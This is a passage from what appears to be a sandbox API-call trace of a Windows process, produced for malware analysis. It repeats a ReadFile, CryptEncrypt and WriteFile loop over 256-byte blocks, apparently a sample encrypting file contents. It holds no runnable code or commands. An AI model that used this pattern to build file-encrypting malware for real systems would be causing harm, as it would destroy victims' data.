GetLastError () returned 0x0 [0149.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.623] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.623] GetLastError () returned 0x0 [0149.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.623] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.623] GetLastError () returned 0x0 [0149.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.623] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.623] GetLastError () returned 0x0 [0149.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.623] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.623] GetLastError () returned 0x0 [0149.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.623] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.623] GetLastError () returned 0x0 [0149.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.624] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.624] GetLastError () returned 0x0 [0149.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.624] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.624] GetLastError () returned 0x0 [0149.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.624] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.624] GetLastError () returned 0x0 [0149.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.624] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.624] GetLastError () returned 0x0 [0149.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.624] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.624] GetLastError () returned 0x0 [0149.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.624] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.624] GetLastError () returned 0x0 [0149.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.625] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.625] GetLastError () returned 0x0 [0149.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.625] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.625] GetLastError () returned 0x0 [0149.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.625] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.625] GetLastError () returned 0x0 [0149.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.625] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.625] GetLastError () returned 0x0 [0149.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.625] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.625] GetLastError () returned 0x0 [0149.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.625] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.625] GetLastError () returned 0x0 [0149.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.625] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.626] GetLastError () returned 0x0 [0149.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.626] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.626] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.626] GetLastError () returned 0x0 [0149.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.626] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.626] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.626] GetLastError () returned 0x0 [0149.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.626] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.626] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.626] GetLastError () returned 0x0 [0149.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.626] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.626] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.626] GetLastError () returned 0x0 [0149.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.626] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.626] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.626] GetLastError () returned 0x0 [0149.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.626] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.626] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.626] GetLastError () returned 0x0 [0149.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.626] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.627] GetLastError () returned 0x0 [0149.627] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.627] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.627] GetLastError () returned 0x0 [0149.627] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.627] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.627] GetLastError () returned 0x0 [0149.627] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.627] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.627] GetLastError () returned 0x0 [0149.627] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.627] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.627] GetLastError () returned 0x0 [0149.627] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.627] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.627] GetLastError () returned 0x0 [0149.627] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.627] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.628] GetLastError () returned 0x0 [0149.628] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.628] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.628] GetLastError () returned 0x0 [0149.628] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: 